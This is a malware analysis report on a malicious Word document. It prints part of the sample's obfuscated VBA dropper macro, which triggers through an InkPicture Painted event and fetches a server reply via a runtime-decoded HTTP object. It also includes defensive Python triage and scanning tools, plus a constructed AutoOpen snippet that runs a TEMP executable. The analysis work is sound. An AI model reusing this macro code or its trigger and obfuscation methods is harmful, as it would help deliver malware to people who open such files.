Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e42fdad4f0754a25…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 86.5 KB
Created: 2016-10-10 20:51:00 (from the document's own OLE metadata; attacker-controlled and not evidence of when the campaign ran)
Authoring application: Microsoft Office Word (also from OLE metadata)
First seen: 2019-04-18
MD5: 6dc2d48e7616adf49aa71f4807911bca
SHA-1: e7e8748608deade7ccb96ae07e022a5741533a99
SHA-256: e42fdad4f0754a25657810dd5ae4626819815353142cb0de14dc38e21e15180b
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample carries VBA macros. The decoded source shows an event handler, Kophy_Painted(ByVal ... As Long, ByVal ... As IInkRectangle), whose signature matches the Painted event of an InkPicture ActiveX control; that event fires when Word draws the control, so the macro runs on open without a conventional AutoOpen or Document_Open procedure. Every string the macro needs (the ProgID passed to CreateObject, the three arguments to Open, the names and values of two request headers, one marker string and a list of 50 comparison strings) is produced at runtime by a decoder function a(text, n1, n2), so none of them is readable in the source. With the CreateObject'd object the macro issues an HTTP request (Open, two SetRequestHeader calls, Send) and keeps the response body only when the status is 200. It then requires the body to contain the decoded marker string (otherwise it raises Error 205) and aborts with Error 206 if the body contains any of the 50 decoded strings; this is a gate on the server's reply whose exact purpose cannot be determined without recovering the decoder. The Shell() call reported by the OLE_VBA_SHELL heuristic lies in the part of the macro not shown in the preview. The document also prompts the user to enable macros, a lure to get past Office's default macro blocking. Taken together this is first-stage dropper behaviour: retrieve a second-stage payload from a URL assembled at runtime and execute it.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-1848766 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1848766
  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro calls Shell(), which runs an arbitrary command line from within the document. The call lies outside the portion of macros.bas previewed below.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro instantiates a COM object with CreateObject. In the previewed source the ProgID is returned by a function rather than written as a literal, and the object is driven with Open, SetRequestHeader and Send, i.e. it serves as an HTTP client.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by droppers to get past Office's default macro blocking
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. A URL is not a detection by itself; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached it.
    All nine URLs below come from the document body and are XML namespace identifiers (RDF, Dublin Core, Adobe XMP/Photoshop/TIFF/EXIF, Office DrawingML) carried by embedded image metadata and drawing parts. They are not network indicators and should not be blocklisted or hunted. No URL was recovered from the macro: its request target is assembled at runtime by the string decoder and never appears in plaintext.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/ (document text, OLE body)
    • http://ns.adobe.com/exif/1.0/ (document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (document text, OLE body)
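The triage rule stated above (namespace URIs are noise, macro-reached URLs are indicators, everything else needs a look) is easy to automate. The following is an added example written for this report, not the tooling that produced it; the nine records are the URLs listed above, the 203.0.113.7 record is a constructed, hypothetical macro-channel entry so the indicator branch is exercised, and the IP-literal rule for static content is this example's own heuristic.

```python
"""Triage URLs pulled from an Office document: separate XML namespace
identifiers (metadata noise) from URLs worth treating as indicators.
Added example for this report; not the tooling that produced it."""
import ipaddress
from urllib.parse import urlsplit

# URI prefixes that appear in Office/XMP/RDF metadata purely as XML
# namespace names; the document never fetches them.
NAMESPACE_PREFIXES = (
    "http://www.w3.org/",
    "http://ns.adobe.com/",
    "http://purl.org/dc/",
    "http://schemas.openxmlformats.org/",
    "http://schemas.microsoft.com/",
)

# Channels that mean active content reached the URL.
ACTIVE_CHANNELS = {"macro", "js"}

# The nine URLs and channels listed in this report (all from the OLE body).
EXTRACTED = [
    ("http://www.w3.org/1999/02/22-rdf-syntax-ns#", "body"),
    ("http://ns.adobe.com/xap/1.0/", "body"),
    ("http://purl.org/dc/elements/1.1/", "body"),
    ("http://ns.adobe.com/photoshop/1.0/", "body"),
    ("http://ns.adobe.com/xap/1.0/mm/", "body"),
    ("http://ns.adobe.com/xap/1.0/sType/ResourceEvent#", "body"),
    ("http://ns.adobe.com/tiff/1.0/", "body"),
    ("http://ns.adobe.com/exif/1.0/", "body"),
    ("http://schemas.openxmlformats.org/drawingml/2006/main", "body"),
]

# Constructed record (hypothetical; not from the sample) so the macro
# channel branch is exercised. 203.0.113.0/24 is a documentation range.
CONSTRUCTED = [("http://203.0.113.7/img/update.php", "macro")]


def classify(url, channel):
    """Return 'indicator', 'namespace' or 'review' for one extracted URL.

    indicator: reached from active content, or an IP-literal host in
               static content; treat as an IOC.
    namespace: an XML namespace URI; not a network indicator.
    review:    any other static URL; needs an analyst's look.
    """
    url = url.strip()
    if channel in ACTIVE_CHANNELS:
        return "indicator"
    if url.startswith(NAMESPACE_PREFIXES):
        return "namespace"
    host = urlsplit(url).hostname or ""
    try:
        ipaddress.ip_address(host)   # raises ValueError for DNS names
        return "indicator"
    except ValueError:
        return "review"


def triage(records):
    """Bucket (url, channel) pairs by classification, preserving order."""
    buckets = {"indicator": [], "namespace": [], "review": []}
    for url, channel in records:
        buckets[classify(url, channel)].append(url)
    return buckets


if __name__ == "__main__":
    for bucket, urls in triage(EXTRACTED + CONSTRUCTED).items():
        print(f"{bucket}: {len(urls)}")
        for u in urls:
            print("   ", u)
```

Run against the report's own list, all nine URLs land in the namespace bucket and nothing is left for review; only the constructed macro record becomes an indicator. The channel check runs before the namespace check on purpose: a namespace-looking URL that active code actually requests is still worth an analyst's attention.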

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6073 bytes
SHA-256: 6555c3f803f619be22f217b84c244cbfa782e868688d654a35f5866610209f35
Preview of the extracted script (first 1,000 lines; the listing below is truncated)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim vGfGTZ As Boolean
Public Sub zACPgx()
If vGfGTZ Then Exit Sub
vGfGTZ = True
CaOXz
End Sub
Public Sub Kophy_Painted(ByVal rgASQ As Long, ByVal cEwMEHX As IInkRectangle)
zACPgx
End Sub
Public Sub qRxCP()
DJnlpDa = hfaTr
If Not JJyTw(DJnlpDa, a("jDNCDwAAOMNIEV", 51, 106)) Then Error 205
If ICdZB(DJnlpDa, ZeHTx) Then Error 206
End Sub
Private Function hfaTr() As String
Set LnTCqYF = CreateObject(QlYWRXx)
LnTCqYF.Open uKFlrR, xUAdmLc, mmAoEO
LnTCqYF.SetRequestHeader a("XUgssehenMrtA-MRA", 88, 137), a("6Nwn .EMeipc0/loRO)5ni .TsdW0 S;bao 4lzeQp.tdT0  oi;7I ltm(.aiMLV0/er;", 163, 622)
LnTCqYF.SetRequestHeader nnDCn, uvpcMrU
LnTCqYF.Send
If 200 = LnTCqYF.Status Then
hfaTr = LnTCqYF.ResponseText
End If
End Function
Private Function QlYWRXx() As String
QlYWRXx = a("nuiqWeVRnpItWtwHKnQi1W..5p.tttsHe", 64, 70)
End Function
Private Function nnDCn() As String
nnDCn = a("eRIrEgeElfwreE", 95, 15)
End Function
Private Function uvpcMrU() As String
uvpcMrU = a("staeyspxn-Dsm/ia:ilpJ/no-W/dcafw.adSwctdXwoerh.m-etm/m", 437, 531)
End Function
Private Function xUAdmLc() As String
xUAdmLc = a("m/eo.Cvmh/.sy/wSimS2itcc:/gwopaC.ntio/mewQ/xi1dpt", 160, 449)
End Function
Private Function ZeHTx()
ZeHTx = Array(a("OEOJlNksTcEhi", 93, 124), a("cRArkratbpHoDKiOSCELUimo", 203, 224), a("cNQjmrwRDePiEpo Ta", 133, 196), a("rwEGTErCkaTk MdnIa", 49, 32), a("ocsicCBToEnq", 23, 28), _
a("wsrWrCTeJErHV", 112, 92), a("MeAIWscmoteKmsm", 26, 52), a("DMmDGEiiEINUAnC", 37, 106), a(" rkUTPoTEuOnIpGR", 117, 76), a("CyOteniTRoflKJa", 29, 55), _
a("tnecAtaDMmHNkKkre", 67, 109), a("AltSuutVhwBSUreF", 39, 22), a("uFlRpDVOhCju", 41, 57), a("TrGsLeoWfocNUEGHGSuiN tKeo", 265, 251), a("ZAMAqtOkuDENO", 142, 16), _
a("oyEMULaTIpSohtj", 29, 72), a("uIeXcGotAoTbCLy", 92, 131), a("aCMkQAixvDcraej", 139, 162), a("tDWishnCogfSeZ", 45, 19), a("HHAgUO svoVshx", 61, 117), _
a("PLd KLVOAdOkAwtp", 169, 111), a("DIcrcxuAdmteJEdb", 83, 88), a("QTemdNGaTQTRwaEmc", 173, 55), a("ZODRtpnXiUoppCfUo", 168, 56), a("CNJRziCBzsEefY", 19, 65), _
a("makoNeUOisNFTYgA", 131, 81), a("rwkreiZwEeFkay", 93, 38), a("qkVZXsKROwtenEsidARAPGy", 229, 135), a("BveEGBaIHlSTSgmYas", 133, 104), a("CxLAeEkhnlEswBe", 53, 47), _
a("mrlVCubGagxVTT", 53, 45), a("RjtOTnSmQOIefCrt", 35, 71), a("iePkmecAPsKCArrh", 95, 77), a("UealPtNaoeSsVRm", 109, 132), a("ERATIwZGhNWHeW", 45, 123), _
a("ipREyCwrmoTFNiilo", 168, 79), a("kMuCTYzl apvbEOj", 91, 76), a("SEXzlAoCwRUnan", 39, 153), a("sXEZXlJpAjHcar", 67, 101), a("NscqEYsiIkURYiVTe", 143, 146), _
a("kNrGUTNOzdMvAcEep", 55, 105), a("OrewPIntNfhRorF", 26, 110), a("eFkMoMERVIcNl", 133, 102), a("bdMOs,eeyIeLP tsQ", 25, 126), a("RMevcJCdrYIoinTKR", 181, 133), _
a("tyOSyoafrAM", 35, 105), a(".sLHEhIDIhCpKEEHS", 61, 168), a("JfkKDEtSOHeRO", 51, 35), a("cUKIegArSnyuuOt", 131, 23), a("aSddgBfRvTNbGEEXiE", 155, 23))
End Function
Private Function mmAoEO() As Boolean
mmAoEO = False
End Function
Private Function uKFlrR() As String
uKFlrR = a("bZTEGgtlxV", 109, 64)
End Function
Private Function JJyTw(ByVal DjMwzb As String, ByVal anhioZg As String) As Boolean
qJIIXIK = InStrRev(nmiKPTL(DjMwzb), nmiKPTL(anhioZg))
JJyTw = qJIIXIK <> ysVlbdd
End Function
Private Function ysVlbdd() As Integer
ysVlbdd = 0
End Function
Private Function nmiKPTL(ByVal qgAhsjZ As String) As String
nmiKPTL = LCase(qgAhsjZ)
End Function
Private Function ICdZB(ByVal DjMwzb As String, ByVal BQKxeU) As Boolean
For Each anhioZg In BQKxeU
If JJyTw(DjMwzb, anhioZg) Then GoTo yEPjK
Next
Exit Function
yEPjK:
ICdZB = True
End Function
Private Function nFzRRtI(ByVal qgAhsjZ As String, ByVal qJIIXIK As Integer) As String
nFzRRtI = aOJBu(iEgcz(qgAhsjZ, qJIIXIK), 1)
End Function
Private Function aOJBu(ByVal qgAhsjZ As String, ByVal qJIIXIK As Integer) As String
aOJBu = Rig
... (truncated)
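The OLE_VBA_SHELL and OLE_VBA_CREATEOBJ findings above, plus the three traits visible in the decoded source (an InkPicture Painted handler as the trigger, a CreateObject'd object driven as an HTTP client, and strings produced by a decoder of the form a("...", n, n)), can be checked with a few regular expressions over the extracted module. The scanner below is an added example and is not the tool that generated this report. VBA_EXCERPT is taken from the macros.bas listing above; VBA_SHELL_SNIPPET is a constructed, hypothetical macro written only to exercise the Shell() and AutoOpen rules; the VBA_* labels are this example's own, while the two OLE_VBA_* labels are the report's IDs.

```python
"""Static heuristics over decoded VBA source, in the spirit of the
OLE_VBA_SHELL / OLE_VBA_CREATEOBJ findings in this report.
Added example; it is not the scanner that produced the report."""
import re
from collections import Counter

# Excerpt of the macros.bas artifact shown in this report. The previewed
# portion contains no Shell() call (the preview is truncated).
VBA_EXCERPT = r'''
Public Sub Kophy_Painted(ByVal rgASQ As Long, ByVal cEwMEHX As IInkRectangle)
zACPgx
End Sub
Private Function hfaTr() As String
Set LnTCqYF = CreateObject(QlYWRXx)
LnTCqYF.Open uKFlrR, xUAdmLc, mmAoEO
LnTCqYF.SetRequestHeader a("XUgssehenMrtA-MRA", 88, 137), a("6Nwn .EMeipc0/loRO)5ni .TsdW0 S;bao 4lzeQp.tdT0  oi;7I ltm(.aiMLV0/er;", 163, 622)
LnTCqYF.SetRequestHeader nnDCn, uvpcMrU
LnTCqYF.Send
If 200 = LnTCqYF.Status Then
hfaTr = LnTCqYF.ResponseText
End If
End Function
Private Function QlYWRXx() As String
QlYWRXx = a("nuiqWeVRnpItWtwHKnQi1W..5p.tttsHe", 64, 70)
End Function
Private Function uKFlrR() As String
uKFlrR = a("bZTEGgtlxV", 109, 64)
End Function
'''

# Constructed snippet (hypothetical, not from the sample) to exercise the
# Shell() and AutoOpen rules.
VBA_SHELL_SNIPPET = r'''
Sub AutoOpen()
    Dim p As String
    p = Environ("TEMP") & "\x.exe"
    Shell p, vbHide
End Sub
'''

AUTO_EXEC = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(AutoOpen|AutoExec|Auto_Open|AutoClose|Document_Open|Workbook_Open)\b',
    re.I | re.M)
# Painted handler of an InkPicture control: fires when the control is
# drawn, so the macro runs on open without a classic auto-exec name.
INK_EVENT = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+(\w+_Painted)\s*\([^)]*\bIInkRectangle\b',
    re.I | re.M)
# Shell as a statement or function, not the ".Shell" inside a ProgID string.
SHELL_CALL = re.compile(r'(?<![\w.])Shell\b', re.I)
CREATEOBJ = re.compile(r'\bSet\s+(\w+)\s*=\s*CreateObject\s*\(\s*([^)]*?)\s*\)', re.I)
# f("literal", int, int): the shape of the sample's string decoder a().
DECODER_CALL = re.compile(r'(?<![\w.])([A-Za-z_]\w*)\s*\(\s*"[^"]*"\s*,\s*\d+\s*,\s*\d+\s*\)')


def scan_vba(source):
    """Return a dict of raw observations about one VBA module."""
    obs = {
        "shell": bool(SHELL_CALL.search(source)),
        "auto_exec": AUTO_EXEC.findall(source),
        "event_trigger": INK_EVENT.findall(source),
        "createobject": False,
        "runtime_progid": False,   # CreateObject argument is not a string literal
        "http_objects": [],        # objects driven with Open/Send and Status/ResponseText
        "decoder_calls": {},       # function name -> call count, for names called 3+ times
    }
    for var, arg in CREATEOBJ.findall(source):
        obs["createobject"] = True
        if not arg.startswith('"'):
            obs["runtime_progid"] = True
        methods = {m.lower() for m in re.findall(r'\b' + re.escape(var) + r'\.(\w+)', source)}
        if {"open", "send"} <= methods and methods & {"responsetext", "status"}:
            obs["http_objects"].append(var)
    counts = Counter(DECODER_CALL.findall(source))
    obs["decoder_calls"] = {f: n for f, n in counts.items() if n >= 3}
    return obs


def labels(source):
    """Map observations to finding IDs. OLE_VBA_* are the report's own IDs;
    VBA_* are labels introduced by this example."""
    obs = scan_vba(source)
    out = []
    if obs["shell"]:
        out.append("OLE_VBA_SHELL")
    if obs["createobject"]:
        out.append("OLE_VBA_CREATEOBJ")
    if obs["auto_exec"] or obs["event_trigger"]:
        out.append("VBA_AUTO_TRIGGER")
    if obs["http_objects"]:
        out.append("VBA_HTTP_CLIENT")
    if obs["decoder_calls"]:
        out.append("VBA_STRING_DECODER")
    return out


if __name__ == "__main__":
    for name, src in (("macros.bas excerpt", VBA_EXCERPT), ("constructed snippet", VBA_SHELL_SNIPPET)):
        print(name, labels(src))
        print("   ", scan_vba(src))
```

On the excerpt the scanner reports CreateObject with a runtime-computed ProgID, the Painted trigger, one HTTP client object (LnTCqYF) and four calls to the decoder a(), but no Shell(): that matches the report, whose Shell() finding comes from the part of the module the preview does not show. Counting calls per function name rather than matching the name "a" is deliberate; the decoder is renamed in every build of such droppers, but its call shape and call density are not.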